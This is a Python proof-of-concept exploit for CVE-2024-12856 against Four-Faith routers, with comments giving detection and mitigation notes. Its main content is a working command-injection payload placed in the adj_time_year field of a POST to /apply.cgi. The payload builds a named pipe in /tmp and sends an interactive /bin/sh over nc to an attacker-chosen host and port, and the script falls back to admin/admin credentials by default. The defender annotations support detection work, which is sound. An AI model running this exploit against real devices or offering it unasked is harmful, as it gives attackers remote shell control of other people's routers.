# Proof-of-concept for CVE-2024-12856 (named in the argparse description below).
#
# What the script does: it sends one authenticated HTTP POST to /apply.cgi on the
# router with submit_type=adjust_sys_time and places a shell command substitution
# in the adj_time_year form field. The payload only works if the device expands
# that field in a shell instead of validating it as a year.
#
# Defender notes (derived from the request built in this file):
#   * Detection: in web/proxy/IDS logs, look for POSTs to /apply.cgi carrying
#     submit_type=adjust_sys_time where any adj_time_* value is not purely numeric
#     (for example contains "$(", backticks, ";" or "|").
#   * Host artefacts: this PoC creates a named pipe called "bOY" under /tmp and
#     starts an outbound nc connection from the router; both are unexpected there.
#   * Mitigation: the request needs valid credentials and the script defaults to
#     admin/admin, so replacing default credentials and keeping the management
#     interface off untrusted networks removes the easy path; apply the vendor
#     firmware fix where one is available.
#   * The User-Agent below is a static browser string that the author invites
#     users to change, so it is not a reliable indicator on its own.
import requests
from requests.auth import HTTPBasicAuth
import argparse


def make_request(ip, lhost, lport, user, password, rport):
    """Send the single crafted POST to the router's /apply.cgi endpoint.

    Args:
        ip: Router address or hostname, interpolated into the URL.
        lhost: Address the injected command connects back to.
        lport: Port the injected command connects back to.
        user: Username for HTTP Basic authentication.
        password: Password for HTTP Basic authentication.
        rport: TCP port of the router's web interface.

    Returns:
        None. The HTTP response is discarded, so the caller cannot tell from
        this function whether the request was accepted, rejected or ignored.
    """
    # Plain http:// combined with Basic auth below means the credentials cross
    # the network unencrypted.
    url = "http://{IP}:{PORT}/apply.cgi".format(IP = ip, PORT = rport)
    data = {
        "adj_time_sec": "32",
        "change_action": "gozila_cgi",
        "adj_time_day": "27",
        "adj_time_mon": "10",
        "adj_time_hour": "11",
        # The injection point: a field that should hold a year carries a $(...)
        # command substitution instead. Server-side, the fix is to accept digits
        # only here (and in the other adj_time_* fields) before any shell use.
        "adj_time_year": "$(cd /tmp/; mknod bOY p;cat bOY|/bin/sh -i 2>&1|nc {IP} {PORT} >bOY; rm bOY;)".format(IP=lhost, PORT = lport),
        "adj_time_min": "35",
        "submit_button": "index",
        "action": "Save",
        # Selects the system-time adjustment handler that consumes adj_time_*.
        "submit_type": "adjust_sys_time",
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36", # feel free to change it
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept-Encoding": "gzip",
    }
    auth = HTTPBasicAuth(user, password)
    try:
        requests.post(url, headers=headers, data=data, auth=auth)
    except Exception as e:
        # NOTE(review): every exception is reported as a credentials problem,
        # although this handler catches any failure of the request, including
        # ones unrelated to authentication. The message is not a reliable
        # diagnosis.
        print(e)
        print("Wrong credentials")


def main():
    """Parse the command-line arguments and pass them to make_request.

    RHOST, LHOST and LPORT are required positionals; username, password and
    remote port are optional and default to admin, admin and 80. No argument is
    validated or type-converted here: values are forwarded as parsed and are
    only interpolated into strings by make_request.
    """
    parser = argparse.ArgumentParser(description="Exploit for CVE-2024-12856 to get a reverse shell to Four-Faith routers")
    # Mandatory arguments
    parser.add_argument("RHOST", help="The remote IP address. Also accepts domains")
    parser.add_argument("LHOST", help="The local IP for reverse shell")
    parser.add_argument("LPORT", help="The local port")
    # Optional arguments
    # The admin/admin defaults mirror credentials a device may still ship with;
    # a router that still accepts them is exposed to this request.
    parser.add_argument("-u", "--username", default="admin", help="Username for authentication (default: admin)")
    parser.add_argument("-p", "--password", default="admin", help="Password for authentication (default: admin)")
    parser.add_argument("-rport", "--remote_port", default=80, help="Remote port (default: 80)")
    args = parser.parse_args()
    ip = args.RHOST
    lhost = args.LHOST
    lport = args.LPORT
    user = args.username
    password = args.password
    rport = args.remote_port
    make_request(ip, lhost, lport, user, password, rport)


if __name__ == "__main__":
    main()